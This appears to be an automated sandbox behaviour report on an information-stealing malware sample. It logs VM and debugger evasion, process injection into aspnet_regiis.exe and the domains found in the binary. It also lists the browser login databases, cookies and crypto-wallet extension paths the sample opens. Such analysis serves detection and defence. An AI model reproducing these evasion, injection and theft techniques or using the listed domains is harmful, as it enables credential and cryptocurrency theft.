                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 4EC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 5EC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 5FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 6FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 7340000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 8340000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: 9340000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 6805Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7728Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7944Thread sleep count: 6805 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeLast function: Thread delayed
                Source: Amcache.hve.4.drBinary or memory string: VMware
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941645039.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_2-13763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CD760 LdrInitializeThunk,2_2_027CD760
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE201CA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE201CA
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE21955 mov eax, dword ptr fs:[00000030h]0_2_6CE21955
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE22B29 mov eax, dword ptr fs:[00000030h]0_2_6CE22B29
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE2473C GetProcessHeap,0_2_6CE2473C
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE1FCF1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CE1FCF1
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE201CA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE201CA
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE22B5A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE22B5A
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2790000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2790000 value starts with: 4D5AJump to behavior
                Source: 9cOUjp7ybm.exeString found in binary or memory: rabidcowse.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: noisycuttej.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: tirepublicerj.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: framekgirus.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: wholersorie.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: abruptyopsn.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: nearycrepso.shop
                Source: 9cOUjp7ybm.exeString found in binary or memory: undesirabkel.click
                Source: 9cOUjp7ybm.exeString found in binary or memory: cloudewahsj.shop
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2790000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2791000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D1000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D4000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27E2000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2791000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D1000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D4000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27E2000Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 24D0008Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE20398 cpuid 0_2_6CE20398
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeQueries volume information: C:\Users\user\Desktop\9cOUjp7ybm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE1FE13 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CE1FE13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941645039.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1810028807.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: aspnet_regiis.exe, 00000002.00000003.1796910856.0000000002B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: aspnet_regiis.exe, 00000002.00000003.1806512102.0000000002B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3er
                Source: aspnet_regiis.exe, 00000002.00000003.2002977474.0000000002ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: aspnet_regiis.exe, 00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: aspnet_regiis.exe, 00000002.00000003.1796850904.0000000002B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
